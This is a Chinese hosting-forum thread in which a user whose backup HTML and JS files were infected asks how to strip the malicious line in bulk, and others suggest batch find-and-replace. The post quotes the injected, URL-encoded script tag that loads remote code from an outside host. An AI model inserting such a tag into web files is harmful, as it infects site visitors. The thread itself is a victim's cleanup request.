全球主机交流论坛

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码

一不小心就中毒了,奶奶的HTML、JS全都被上马了,好阴险

给客户一机器装完驱动后,我把移动硬盘**机器上找个东西,结果打开一个EXE没反应,心里瞬间哇凉,直接按电源键强关机,进另一个系统,用数字查杀病毒1K多的HTML和js都被改了
这些html和js都是备份的文件,没有什么重要的,如果是重要的被传到网站上 不敢想象后果...

所有的js和HTML最后都加上了一行
  1. <script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
复制代码

解密后是:
  1. http://js.k0102.com/01.asp
复制代码

请问各位MJJ 这些挂了的文档怎么批量删除这行东西?用Notepad++批量替换 还是有更好的办法?
看到你的签名  我决定做一个围观的吃瓜群众。
Kvm 发表于 2016-8-14 17:53

K肿我错了
用python写一个批量替换  几分钟搞定
各种好用的文件编辑器也有这功能,指定文件夹全部替换或者替换所有一打开文件夹。
要更好用就自己写一个替换脚本
Kvm 发表于 2016-8-14 17:53

用了我的短网址后,你的签名可以更长。

短网址棒棒哒~~~  发表于 2016-8-14 20:12
filtme 发表于 2016-8-14 18:01
用python写一个批量替换  几分钟搞定

已经解决了,看着那些文件基本上是玩PHPwind剩下的玩意,都删了
almostsir 发表于 2016-8-14 18:02
用了我的短网址后,你的签名可以更长。

你一直都很短。。。。。。。。